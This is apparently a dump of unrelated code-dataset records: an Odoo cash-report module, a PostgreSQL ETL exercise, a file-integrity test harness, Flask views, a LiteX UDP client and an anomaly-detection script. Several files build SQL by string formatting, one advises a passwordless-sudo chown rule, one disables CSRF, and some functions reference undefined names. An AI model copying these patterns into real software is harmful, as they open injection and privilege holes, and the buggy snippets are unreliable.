titulo=fields.Char(string=\"Titulo\",default='Reporte de Caja')\n fecha_desde = fields.Date(string=\"Fecha desde\")\n fecha_hasta = fields.Date(string=\"Fecha hasta\")\n journal_ids=fields.Many2many('account.journal',string='Caja')\n usuario_id=fields.Many2one('res.users',string=\"Usuario\", default=lambda self:self.env.user ,readonly=True)\n fecha_emision = fields.Date(string=\"Fecha Emision\")\n\n filename=fields.Char(string=\"Nombre de archivo\")\n archivo_xls=fields.Binary(string='Archivo Excel')\n filename_pdf=fields.Char(string=\"Nombre de archivo\")\n archivo_pdf=fields.Binary(string='Archivo PDF')\n\n _defaults = {\n 'fecha_emision': fields.datetime.now(),\n }\n\n\n#----------------------------------------------------------\n# Obtencion de datos -\n#---------------------------------------------------------- \n @api.multi\n def consultar(self):\n lista_id=''\n if self.fecha_desde and self.fecha_hasta and self.journal_ids:\n for j in self.journal_ids:\n if lista_id!='':\n lista_id=lista_id+','+str(j.id)\n else:\n lista_id=str(j.id)\n sql=\"\"\"SELECT id from account_voucher where date between '{0}' AND '{1}' and account_journal_caja_id in ({2}) and state in ('posted') order by id,date,number asc\"\"\".format(self.fecha_desde,self.fecha_hasta,lista_id)\n self.env.cr.execute(sql)\n lista_facturas=self.env.cr.dictfetchall()\n lista_facturas_id = [value['id'] for value in lista_facturas]\n obj_datos=self.env['account.voucher'].search([('id','in',lista_facturas_id)])\n dic={}\n lista_datos=[]\n descripcion=''\n for l in obj_datos:\n for det in l.line_cr_ids:\n dic={}\n if det.amount!=0.0:\n obj_move_line=self.env['account.move.line'].search([('id','=',det.move_line_id.id)])\n obj_invoice=self.env['account.invoice'].search([('number','=',obj_move_line.ref)])\n dic={\n 'tipo':l.account_journal_caja_id.categoria_reporte,\n 'numero':l.number,\n 'fecha_pago':l.date,\n #INTEGRACION: SE CAMBIA POR PEDIDO DE CAMBIO DE NUMERO\n #'factura':obj_invoice.number,\n 'factura':obj_invoice.numerofac,\n 'monto':det.amount,\n 'cliente':obj_invoice.alumno_id.name,\n 'banco':l.banco_id.name,\n 'documento':l.documento,\n 'fecha_ch':l.fecha_ch,\n 'comentario':l.narration\n }\n lista_datos.append(dic)\n \n lista_tipo=[]\n for tipos in lista_datos:\n if tipos['tipo'] not in lista_tipo:\n lista_tipo.append(tipos['tipo'])\n\n #-------------------------------------------------------------------------------------------------------------------\n # AGRUPAR LAS CABECERAS -\n # SE AGRUPA LAS JORNADAS,SECCION,CURSO,PARALELO PARA TENER UNA SOLA LISTA DE TODAS SI DUPLICADOS -\n #-------------------------------------------------------------------------------------------------------------------\n lista_cabecera=[]\n dic_cab={}\n for m in lista_datos:\n dic_cab={\n 'tipo':m['tipo'],\n }\n if dic_cab not in lista_cabecera:\n lista_cabecera.append(dic_cab)\n\n\n #-------------------------------------------------------------------------------------------------------------------\n # AGRUPAR LAS CABECERAS Y DETALLE -\n # CON LA CABECERAS AGRUPADAS SOLO SE LES AGREGA UNA LISTA CON LOS DETALLES DE LOS ALUMNOS -\n #-------------------------------------------------------------------------------------------------------------------\n lista_completa=[]\n for n in lista_cabecera:\n dic_cab={\n 'tipo':n['tipo'],\n }\n detalle={}\n lista_detalle=[]\n for deta in lista_datos:\n if deta['tipo'] == n['tipo']:\n detalle={\n 'numero':deta['numero'],\n 'fecha_pago':deta['fecha_pago'],\n 'factura':deta['factura'],\n 'monto':deta['monto'],\n 'cliente':deta['cliente'],\n 'banco':deta['banco'],\n 'documento':deta['documento'],\n 'fecha_ch':deta['fecha_ch'],\n 'comentario':deta['comentario'],\n }\n lista_detalle.append(detalle)\n lista_detalle_ordenada=sorted(lista_detalle, key = lambda user: user['numero'])\n\n dic_det={\n 'tipo':n['tipo'],\n 'detalle':lista_detalle_ordenada,\n }\n lista_completa.append(dic_det)\n\n cadena=''\n for fil in self.journal_ids:\n obj_move_line=self.env['account.journal'].search([('id','=',fil.id)])\n if cadena=='':\n cadena=obj_move_line.name\n else:\n cadena=cadena+' ,'+obj_move_line.name\n\n datos={\n 'lista':lista_completa,\n 'cant':len(obj_datos),\n 'filtro':cadena,\n }\n\n return datos\n#-------------------------------------------------------------------------------------------------------------------\n# CREACION DE EXCEL -\n#-------------------------------------------------------------------------------------------------------------------\n\n @api.multi\n def generar_excel(self):\n fp =io.BytesIO()\n workbook = self.crear_excel_info()\n workbook.save(fp)\n self.filename = 'Informe.xlsx'\n self.archivo_xls=base64.b64encode(fp.getvalue()) \n return True\n\n def crear_excel_info(self):\n wb = crear_informe_caja_excel.crear_wb_informe()\n self.crear_informe(wb)\n return wb \n\n\n def crear_informe(self, wb):\n fecha_a = datetime.strptime(self.fecha_emision, '%Y-%m-%d')\n fecha_actual = datetime.strftime(fecha_a, '%d/%b/%Y')\n dic ={\n 'fecha_desde':self.fecha_desde,\n 'fecha_hasta':self.fecha_hasta,\n 'usuario_id':self.usuario_id.name,\n 'fecha_corte':fecha_actual,\n 'company_id':self.usuario_id.company_id.name,\n }\n\n lista_alumnos=[]\n cant_alumno=0\n datos=self.consultar()\n lista_datos=datos['lista']\n cant_datos=datos['cant']\n filtro=datos['filtro']\n\n sheet_info = crear_informe_caja_excel.crea_hoja_info(wb, 'Informe ',0)\n sheet_view = openpyxl.worksheet.SheetView()\n sheet_view.zoomScale = \"130\"\n sheet_view.zoomScaleNormal = \"130\"\n sheet_info.sheet_view = sheet_view\n sheet_info.zoomScale = \"130\"\n crear_informe_caja_excel.Informe(sheet_info, dic,lista_datos,cant_datos,filtro)\n\n#-------------------------------------------------------------------------------------------------------------------\n# CREACION DE PDF -\n#-------------------------------------------------------------------------------------------------------------------\n @api.multi\n def generar_pdf(self):\n filename_pdf=''\n filename_pdf=''\n fp =io.BytesIO()\n workbook = self.crear_excel_info_pdf()\n workbook.save(fp)\n filename_pdf = 'Informe.xlsx'\n archivo_pdf=base64.b64encode(fp.getvalue())\n obj=self.env['ir.attachment']\n obj_xls=obj.create({'res_model':self.id,'name':filename_pdf,'datas':archivo_pdf,'type':'binary','datas_fname':filename_pdf})\n direccion_xls=obj._get_path(obj_xls.datas)[1]\n direccion=obj._get_path(obj_xls.datas)[0]\n nombre_bin=obj_xls.store_fname\n nombre_archivo=obj_xls.datas_fname\n separa = direccion_xls.rstrip(direccion)\n os.chdir(separa)\n os.rename(nombre_bin,nombre_archivo)\n commands.getoutput(\"\"\" libreoffice --headless --convert-to pdf *.xlsx\"\"\") \n with open(direccion_xls.rstrip(direccion)+'/'+nombre_archivo.split('.')[0]+'.pdf', \"rb\") as f:\n data = f.read()\n file= data.encode(\"base64\")\n self.write({'filename_pdf':nombre_archivo.split('.')[0]+'.pdf','archivo_pdf':file})\n os.rename(nombre_archivo,nombre_bin)\n obj_xls.unlink()\n \n return True\n\n def crear_excel_info_pdf(self):\n wb = crear_informe_caja_excel.crear_wb_informe()\n self.crear_informe_pdf(wb)\n return wb \n\n def crear_informe_pdf(self, wb):\n fecha_a = datetime.strptime(self.fecha_emision, '%Y-%m-%d')\n fecha_actual = datetime.strftime(fecha_a, '%d/%b/%Y')\n dic ={\n 'fecha_desde':self.fecha_desde,\n 'fecha_hasta':self.fecha_hasta,\n 'usuario_id':self.usuario_id.name,\n 'fecha_corte':fecha_actual,\n 'company_id':self.usuario_id.company_id.name,\n }\n\n lista_alumnos=[]\n cant_alumno=0\n datos=self.consultar()\n lista_datos=datos['lista']\n cant_datos=datos['cant']\n filtro=datos['filtro']\n sheet_info = crear_informe_caja_excel.crea_hoja_info_pdf(wb, 'Informe ',0)\n #sheet_info = crear_informe_cobranza_excel.crea_hoja_info(wb, 'Informe ',0)\n sheet_view = openpyxl.worksheet.SheetView()\n sheet_view.zoomScale = \"70\"\n sheet_view.zoomScaleNormal = \"70\"\n sheet_info.sheet_view = sheet_view\n sheet_info.zoomScale = \"70\"\n crear_informe_caja_excel.Informe_pdf(sheet_info, dic,lista_datos,cant_datos,filtro)","sub_path":"hanibal/ans_reporte/reporte_caja.py","file_name":"reporte_caja.py","file_ext":"py","file_size_in_byte":11150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"622884541","text":"# This line is to be written in the terminal:\n# pip install psycopg2-binary\n\nimport psycopg2\nimport sqlite3\n\n# note: similar to how sqlite3 module worked)\n# terminal: dir(psycopg2)\n# terminal: help(psycopg2.connect)\n\n\n# The following can all be obtained from the element SQL\ndbname = ''\nuser = ''\npassword = '' # do not commit this, or share\nhost = '' # Port should be included or default\n\n\npg_conn = psycopg2.connect(dbname=dbname, user=user, password=password, host=host)\n\n# Note: RPG data from SQLite to PostgreSQL\n# we'd like to get the RPG data out of SQLite and insert it into PostgreSQL.\n# Aka making a datapipeline, aka ETL (extract transform laod)\\\n\npg_curs = pg_conn.cursor()\n\ncreate_table_statement = \"\"\"\nCREATE TABLE test_table (\n id SERIAL PRIMARY KEY,\n name varchar(40) NOT NULL,\n data JSONB\n);\n\"\"\"\npg_curs.execute(create_table_statement)\npg_conn.commit()\n\nquery = \"SELECT * FROM test_table;\"\npg_curs.execute(query)\npg_curs.fetchall()\n\n\nsl_conn = sqlite3.connect('rpg_db.sqlite3')\nsl_curs = sl_conn.cursor()\n\nrow_count = 'SELECT * FROM charactercreator_character'\nsl_curs.execute(row_count).fetchall()\n\nget_characters = 'SELECT * FROM charactercreator_character'\ncharacters = sl_curs.execute(get_characters).fetchall()\n\nsl_curs.execute('PRAGMA table_info(charactercreator_character);').fetchall()\n\ncreate_charactor_table = \"\"\"\nCREATE TABLE charactercreator_character (\n character_id SERIAL PRIMARY KEY,\n name VARCHAR(30),\n level INT,\n exp INT,\n hp INT,\n strength INT,\n intelligence INT,\n dexterity INT,\n wisdom INT\n);\n\"\"\"\npg_curs.execute(create_charactor_table)\npg_conn.commit()\n\nshow_tables = \"\"\"\nSELECT\n *\nFROM\n pg_catalog.pg_tables\nWHERE\n schemaname != 'pg_catalog'\nAND schemaname != 'information_schema';\n\"\"\"\n\npg_curs.execute(show_tables)\npg_curs.fetchall()\n\nexample_insert = \"\"\"\nINSERT INTO charactercreator_character\n(name, level, exp, hp, strength, intelligence, dexterity, wisdom)\nVALUES \"\"\" + str(characters[0][1:]) + \";\"\n\nprint(example_insert)\n\nfor character in characters:\n insert_character = \"\"\"\n INSERT INTO charactercreator_character\n (name, level, exp, hp, strength, intelligence, dexterity, wisdom)\n VALUES \"\"\" + str(character[1:]) + \";\"\n pg_curs.execute(insert_character)\n\npg_curs.execute('SELECT * FROM charactercreator_character')\npg_curs.fetchall()\npg_conn.commit()\n\npg_curs.execute('SELECT * FROM charactercreator_character')\npg_characters = pg_curs.fetchall()\n\nfor character, pg_character in zip(characters, pg_characters):\n assert character == pg_character\n\npg_curs.close()\npg_conn.close()\n","sub_path":"module2-sql-for-analysis/assignment_2_1.py","file_name":"assignment_2_1.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"69464961","text":"#!/usr/bin/env python3\n# Test framework for System Integrity Verifier (SIV)\n# used in course ET2595 at BTH\n#\n# Copyright (C) 2019 by Dragos Ilie\n# All Rights Reserved.\n#\n# This code can freely distributed and changed for academic and\n# self-study purposes.\nimport os\nimport argparse\nimport shutil\nimport gzip\nimport subprocess\n\ndef touch(fname, times=None):\n with open(fname, 'a'):\n os.utime(fname, times)\n\ndef echo(fname, text, compress=False):\n if compress:\n with gzip.open(fname, 'wb') as fh:\n fh.write(text.encode('utf-8'))\n else:\n with open(fname, \"w\") as fh:\n print(text, file=fh)\n\ndef populate_env(envdir):\n mytext = \"Hello\"\n muchtext = \"Hello\\n\" * 200\n # Create file if not existing and then write text to it\n echo(envdir + \"/data/x.txt\", mytext)\n # Create a directory (folder)\n os.mkdir(envdir + \"/data/a\")\n # Create a directory (folder)\n os.mkdir(envdir + \"/data/b\")\n # Create file if it does not exist and then set date to \"now\"\n touch(envdir + \"/data/a/blah.txt\")\n # Create a file if it does not exist and compress any contents written to it\n echo(envdir + \"/data/a/blahblah.gz\", muchtext, compress=True)\n\n\ndef change_env(envdir):\n mytext = \"Bye\"\n # Change content\n echo(envdir + \"/data/x.txt\", mytext)\n # Change access time to \"beginning of time\"\n touch(envdir + \"/data/x.txt\", (0,0))\n # File deleted\n os.remove(envdir + \"/data/a/blahblah.gz\")\n # Folder deleted\n os.rmdir(envdir + \"/data/b\")\n # Folder permission bits, owner and group modified\n os.chmod(envdir + \"/data/a\", 0o777)\n\n # To run \"sudo chown\" in below without being prompted \n # for password enter sudo visudo in a terminal\n # Add the following line after the % sudo line:\n #\n # student ALL = (ALL) NOPASSWD: / bin/chown\n os.system('sudo /bin/chown bob:alice ' + envdir + \"/data/x.txt\")\n\n\ndef make_env(envdir):\n # check if env directory exists\n if os.path.exists(envdir):\n overwrite = input(\"Environment exists! Overwrite (y/n)?\")\n if overwrite is 'y':\n ## Try to remove tree; if failed show an error using try...except on screen\n try:\n shutil.rmtree(envdir)\n except OSError as e:\n print (\"Error: %s - %s.\" % (e.filename, e.strerror))\n return False\n else:\n print(\"Execution interrupted due to existing environment directory\")\n return False\n\n os.makedirs(envdir + \"/data\")\n return populate_env(envdir)\n\n\ndef siv_init(sivexec, envdir):\n siv_cmd = [sivexec, '-i', '-D', envdir + '/data', '-V', envdir + '/vDB', '-R', envdir + '/init.txt', '-H', 'sha1']\n print(' '.join(siv_cmd))\n result = subprocess.run(siv_cmd, stdout=subprocess.PIPE)\n print(result.stdout.decode('utf-8'))\n if result.returncode == 0:\n print(\"*\"*10 + \"INIT COMPLETED\" + \"*\"*10)\n return True\n else:\n print(\"#\"*10 + \"INIT FAILED\" + \"#\"*10)\n return False\n\ndef siv_verify(sivexec, envdir):\n siv_cmd = [sivexec, '-v', '-D', envdir + '/data', '-V', envdir + '/vDB', '-R', envdir + '/verify.txt']\n print(' '.join(siv_cmd))\n result = subprocess.run(siv_cmd, stdout=subprocess.PIPE)\n print(result.stdout.decode('utf-8'))\n if result.returncode == 0:\n print(\"*\"*10 + \"VERIFY COMPLETED\" + \"*\"*10)\n return True\n else:\n print(\"#\"*10 + \"VERIFY FAILED\" + \"#\"*10)\n return False\n\ndef main():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"-s\", \"--siv\", type=str, dest=\"sivexec\", required=True)\n parser.add_argument(\"-e\", \"--env\", type=str, dest=\"envdir\", default=\"./submission\")\n # Do not execute the SIV (because it requires manual exec), just initialize\n # environment\n parser.add_argument(\"-i\", \"--init\", dest=\"init_only\", action='store_true')\n # Do not execute the SIV (because it requires manual exec), just initialize\n # environment\n parser.add_argument(\"-v\", \"--verify\", dest=\"verify_only\", action='store_true')\n\n args = parser.parse_args()\n if args.init_only is True and args.verify_only is True:\n print(\"--init and --verify are mutually exclusive. Use only one of them\")\n if os.path.isfile(args.sivexec) is False:\n print(\"SIV \" + args.sivexec + \" is missing\")\n return -1\n if args.verify_only is False:\n if make_env(args.envdir) is False:\n print(\"Unable to create environment\")\n return -1\n if args.init_only is False and args.verify_only is False:\n if siv_init(args.sivexec, args.envdir) is False:\n print(\"Unable to initialize SIV\")\n return -1\n if args.init_only is False:\n change_env(args.envdir)\n if args.init_only is False and args.verify_only is False:\n if siv_verify(args.sivexec, args.envdir) is False:\n print(\"Unable to VERIFY\")\n return -1\n print(\"COMPLETED\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"test_siv.py","file_name":"test_siv.py","file_ext":"py","file_size_in_byte":4988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"28190194","text":"import requests\nimport json\nimport base64\n\ndef html_to_image(filepath, newfileName):\n\tcreddata = json.load(open('configs/creds.json'))\n\tapi_key = creddata['convertapi']\n\turl = 'https://v2.convertapi.com/html/to/png?Secret=' + api_key\n\tfile = open(filename, 'r')\n\tfilecontent = file.read()\n\tfilecontent = filecontent.encode(\"utf-8\")\n\tfilecontent_base64_encode = base64.b64encode(filecontent)\n\n\tdata = {\n\t \"Parameters\": [\n\t {\n\t \"Name\": \"File\",\n\t \"FileValue\": {\n\t \"Name\": \"bars.html\",\n\t \"Data\": filecontent_base64_encode.decode(\"utf-8\")\n\t }\n\t }\n\t ]\n\t}\n\n\treq = requests.post(url, json=data)\n\treq = req.json()\n\n\tpng_base64_decode = base64.b64decode(req['Files'][0]['FileData'])\n\n\tpngfile = open('../scrapy-yelp-tripadvisor/tutorial/spiders/data/png/' + newFileName + '.png', 'wb')\n\tpngfile.write(png_base64_decode)\n\n","sub_path":"sendgrid/html_to_image.py","file_name":"html_to_image.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"30260051","text":"from flask import render_template, redirect\nfrom flask.globals import request\n\nfrom airwootProject1 import app\nfrom airwootProject1.channelList import channelList \nfrom forms import IndexForm\n\n\ntime_interval = 0\nc = channelList()\n\n@app.route('/', methods = ['GET', 'POST'])\ndef index():\n form = IndexForm(csrf_enabled=False)\n if form.validate_on_submit():\n global time_interval\n time_interval = form.interval.data\n if time_interval <= 0:\n return redirect('/')\n return redirect('/connected')\n return render_template('index.html',\n form = form)\n \n@app.route('/connected', methods = ['GET', 'POST'])\ndef connected():\n if request.method == 'POST':\n key = request.get_data()\n key = key.split(\"=\")[1]\n c.remove(key)\n return redirect('/')\n if time_interval <= 0:\n return render_template('error.html')\n else:\n channel_name = c.generatename()\n c.add(channel_name, time_interval)\n return render_template('connected.html', channelname = channel_name, time_interval = time_interval)","sub_path":"airwootProject1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"133477319","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nbar_width = 0.25\n\n# Choose the height of the error bars (bars1)\n\ndfx = pd.read_csv('/home/jordibisbal/WS18-MSc-JordiBisbalAnsaldo--NetworkSlicing/evaluation/experiments/1/winner/winner1.csv')\n\nfig, ax = plt.subplots(figsize=(7,5))\n\nmean1 = [dfx['I11'].mean(),dfx['I12'].mean(),dfx['I13'].mean(),dfx['I14'].mean(),dfx['I15'].mean()]\nmean2 = [dfx['I21'].mean(),dfx['I22'].mean(),dfx['I23'].mean(),dfx['I24'].mean(),dfx['I25'].mean()]\nmean3 = [dfx['I31'].mean(),dfx['I32'].mean(),dfx['I33'].mean(),dfx['I34'].mean(),dfx['I35'].mean()]\n\nstd1 = [1.96 * dfx['I11'].std()/np.sqrt(100), 1.96 * dfx['I12'].std()/np.sqrt(100), 1.96 * dfx['I13'].std()/np.sqrt(100),1.96 * dfx['I14'].std()/np.sqrt(100),1.96 * dfx['I15'].std()/np.sqrt(100)]\nstd2 = [1.96 * dfx['I21'].std()/np.sqrt(100),1.96 *dfx['I22'].std()/np.sqrt(100),1.96 *dfx['I23'].std()/np.sqrt(100),1.96 *dfx['I24'].std()/np.sqrt(100),1.96 *dfx['I25'].std()/np.sqrt(100)]\nstd3 = [1.96 * dfx['I31'].std()/np.sqrt(100),1.96 *dfx['I32'].std()/np.sqrt(100),1.96 *dfx['I33'].std()/np.sqrt(100),1.96 *dfx['I34'].std()/np.sqrt(100),1.96 *dfx['I35'].std()/np.sqrt(100)]\n\nindex = dfx[dfx['arrivals'].notnull()]['arrivals']\n\nax.bar(index - bar_width, mean1, bar_width, label= 'Infrastructure Provider $InP_1$', yerr=std1, capsize=7);\nax.bar(index, mean2, bar_width, label= 'Infrastructure Provider $InP_2$', yerr=std2, capsize=7);\nax.bar(index + bar_width , mean3, bar_width, label= 'Infrastructure Provider $InP_3$', yerr=std3, color= 'gray',capsize=7);\n\nax.yaxis.grid(linestyle=':',linewidth=1.5)\n\n# Hide the right and top spines\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\n\nplt.tick_params(axis='both', which='major', labelsize=14)\nax.legend(loc=1,prop={'size': 14})\n\nax.set_ylim(ymin=0,ymax=1)\nax.set_xlim(xmin=0,xmax=5.35)\nplt.xlabel('request arrival rate ' +'$\\lambda$', fontsize=14)\nplt.ylabel('average fraction of requests assigned to $InP_x$', fontsize=14)\nax.set_axisbelow(True)\n\nplt.savefig('ev_winners_L1.png')\nplt.show();\n\n\n","sub_path":"evaluation/winners1.py","file_name":"winners1.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507253356","text":"from django import forms\n\nfrom .models import Topic, Entry\n\nclass TopicForm(forms.ModelForm):\n class Meta:\n model = Topic\n fields = ['text']\n labels = {'text': ''}\n \nclass EntryForm(forms.ModelForm):\n class Meta:\n model = Entry\n fields = ['text']\n labels = {'text': ''}\n widgets = {'text': forms.Textarea(attrs={'cols': 80})}\n\ndef edit_entry(request, entry_id):\n\t'''edit an existing entry'''\n\tentry = Entry.objects.get(id=entry_id)\n\ttopic = entry.topic\n\t\n\tif request.method != 'POST':\n\t\t#initial request; pre-fill form with the current entry.\n\t\tform = EntryForm(instance=entry)\n\t\t\n\telse:\n\t\t#POST data submitted; process data.\n\t\tform = EntryForm(instance=entry, data=request.POST)\n\t\t\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn HttpResponseRedirect(reverse('learning_logs:topic', args=[topic.id]))\n\t\t\t\n\tcontext = {'entry':entry, 'topic':topic, 'form':form}\n\treturn render(request, 'learning_logs/edit_entry.html', context)\n\t\t\t\n\n","sub_path":"Learning_log/learning_logs/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273947747","text":"import socket\n\nfrom litex.soc.tools.remote.etherbone import EtherbonePacket, EtherboneRecord\nfrom litex.soc.tools.remote.etherbone import EtherboneReads, EtherboneWrites\nfrom litex.soc.tools.remote.csr_builder import CSRBuilder\n\nclass CommUDP(CSRBuilder):\n def __init__(self, server=\"192.168.1.50\", port=1234, csr_csv=\"csr.csv\", csr_data_width=None, debug=False):\n if csr_csv is not None:\n CSRBuilder.__init__(self, self, csr_csv, csr_data_width)\n self.server = server\n self.port = port\n self.debug = debug\n\n def open(self):\n if hasattr(self, \"tx_socket\"):\n return\n self.tx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.rx_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n self.rx_socket.bind((\"\", self.port))\n\n def close(self):\n if not hasattr(self, \"tx_socket\"):\n return\n self.tx_socket.close()\n del self.tx_socket\n self.rx_socket.close()\n del self.rx_socket\n\n def read(self, addr, length=None):\n length_int = 1 if length is None else length\n record = EtherboneRecord()\n record.reads = EtherboneReads(addrs=[addr+4*j for j in range(length_int)])\n record.rcount = len(record.reads)\n\n packet = EtherbonePacket()\n packet.records = [record]\n packet.encode()\n self.tx_socket.sendto(bytes(packet), (self.server, self.port))\n\n datas, dummy = self.rx_socket.recvfrom(8192)\n packet = EtherbonePacket(datas)\n packet.decode()\n datas = packet.records.pop().writes.get_datas()\n if self.debug:\n for i, value in enumerate(datas):\n print(\"read {:08x} @ {:08x}\".format(value, addr + 4*i))\n return datas[0] if length is None else datas\n\n def write(self, addr, datas):\n datas = datas if isinstance(datas, list) else [datas]\n length = len(datas)\n record = EtherboneRecord()\n record.writes = EtherboneWrites(base_addr=addr, datas=iter(datas))\n record.wcount = len(record.writes)\n\n packet = EtherbonePacket()\n packet.records = [record]\n packet.encode()\n self.tx_socket.sendto(bytes(packet), (self.server, self.port))\n\n if self.debug:\n for i, value in enumerate(datas):\n print(\"write {:08x} @ {:08x}\".format(value, addr + 4*i))\n","sub_path":"litex/soc/tools/remote/comm_udp.py","file_name":"comm_udp.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"154272338","text":"# coding=utf-8\r\n__author__ = 'wujiayi'\r\n__time__ = '2019/10/9 12:18'\r\n\r\nimport allure\r\nimport pytest\r\n\r\nfrom Params.params import Basic\r\nfrom Conf.Config import Config\r\nfrom Common import Request\r\nfrom Common import Consts\r\nfrom Common import Assert\r\n\r\n\r\n@pytest.allure.feature('基础模块')\r\nclass TestBasic:\r\n\r\n\t@allure.severity('blocker')\r\n\t@allure.story('Basic')\r\n\t@pytest.mark.filterwarnings(\"ignore\")\r\n\tdef test_basic_01(self, action):\r\n\t\t\"\"\"\r\n\t\t\t用例描述:未登陆状态下查看基础设置\r\n\t\t\"\"\"\r\n\t\tconf = Config()\r\n\t\tdata = Basic()\r\n\t\ttest = Assert.Assertions()\r\n\t\trequest = Request.Request(action)\r\n\r\n\t\treq_url = conf.host_debug\r\n\t\turls = data.url\r\n\t\t# params = data.data\r\n\t\theaders = data.header\r\n\r\n\t\tapi_url = req_url + urls[0]\r\n\t\tresponse = request.get_request(api_url, None, headers[0])\r\n\r\n\t\tassert test.assert_code(response['code'], 200)\r\n\t\tassert test.assert_body(response['body'], 'code', 1)\r\n\t\tassert test.assert_body(response['body'], 'message', '操作成功')\r\n\t\tassert test.assert_time(response['time_consuming'], 500)\r\n\t\tConsts.RESULT_LIST.append('True')\r\n","sub_path":"TestCase/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646467987","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport json\nimport requests\nfrom myapp import celery, connect_redis, get_token\nfrom myapp.tasks.sms import kzbot\n\nheaders = {'Content-Type': 'application/json'}\n\nr = connect_redis(1)\n\n@celery.task\ndef get_job(env):\n '''\n 轮询函数,用于获取job_id\n '''\n print(env)\n token = get_token(env)\n url = f'https://api.kzfeed.com/bot/{token}/getJob'\n print(url)\n job = requests.get(url, headers=headers)\n print(job.json())\n if job.json()['errno']==0:\n job_id = job.json()['job']['job_id']\n uuid = job.json()['job']['params']['uuid'] \n if r.set(uuid, job_id, nx=True) == True:\n title = '欢迎您使用PMBotd订阅信息服务!'\n content = f\"请将下面的链接添加到post:\\nhttp://api.senlief.xyz/pmbot/sms/{uuid}\"\n kzbot(job_id, title, content)\n return 'Add a new job!'\n else:\n return 'Not a new job'\n else:\n return 'get job error!'","sub_path":"myapp/tasks/job.py","file_name":"job.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"399145588","text":"import os\nimport sys\n\nfrom flask import Flask, request, render_template\n\n# In python we can create object instances \n# and assign them to variables for safekeeping!\napp = Flask(__name__)\n\n# Here we tell the server that whenever someone goes to\n# \"/\", it needs to show them the home page\n@app.route(\"/\")\ndef home():\n return render_template(\"v12/home.html\")\n\n# Don't worry about this! It's just some settings for\n# the server to follow\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n app.run(host='0.0.0.0', port=port, threaded=True, debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"477851811","text":"from utils import Context\n\nasync def attempt_vc_connect(ctx: Context):\n if ctx.message.author.voice is None:\n await ctx.reply('You are not in a voice channel')\n return \n voice_channel = ctx.message.author.voice.channel\n if ctx.message.guild.voice_client is None:\n await voice_channel.connect()\n voice_client = ctx.message.guild.voice_client\n if voice_client.channel != voice_channel:\n await ctx.reply(f'Sorry, I am already in <#{voice_client.channel.id}> with people~')\n return \n return voice_client","sub_path":"tasks/vc_utils.py","file_name":"vc_utils.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25396240","text":"\"\"\" Run all TurbSim input files in specified directory.\n\n Jenni Rinker, 08-Apr-2015\n\"\"\"\nimport os\n\n# directory name\ndname = '2-myflag'\n\n# get list of input files\nfiles = os.listdir(dname)\nfor file in files:\n if file.endswith('.inp'):\n os.system(os.path.join(dname,'TurbSim_glin64') + ' ' + \\\n os.path.join(dname,file))\n","sub_path":"archive/turbsim_v2.0-modification_fromZip/RunAllTSInp.py","file_name":"RunAllTSInp.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"312418484","text":"#!/usr/local/bin/python3\n# coding: UTF-8\n# Author: David\n# Email: youchen.du@gmail.com\n# Created: 2017-03-03 20:52\n# Last modified: 2017-03-03 21:26\n# Filename: anomaly.py\n# Description:\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom scipy import stats\nfrom scipy.io import loadmat\n\n\ndef estimate_gaussion(X):\n mu = X.mean(axis=0)\n sigma2 = X.var(axis=0)\n\n return mu, sigma2\n\n\ndef select_threshold(pval, yval):\n best_epsilon = 0\n best_f1 = 0\n f1 = 0\n\n step = (pval.max() - pval.min()) / 1000\n\n for epsilon in np.arange(pval.min() + step, pval.max(), step):\n preds = pval < epsilon\n\n tp = np.sum(np.logical_and(preds == 1, yval == 1).astype(float))\n fp = np.sum(np.logical_and(preds == 1, yval == 0).astype(float))\n fn = np.sum(np.logical_and(preds == 0, yval == 1).astype(float))\n\n precision = tp / (tp + fp)\n recall = tp / (tp + fn)\n\n f1 = 2 * precision * recall / (precision + recall)\n\n if f1 > best_f1:\n best_f1 = f1\n best_epsilon = epsilon\n\n return best_epsilon, best_f1\n\n\ndata = loadmat('ex8data1.mat')\nX = data['X']\nXval = data['Xval']\nyval = data['yval']\n\nfig, ax = plt.subplots(figsize=(12, 8))\nax.scatter(X[:, 0], X[:, 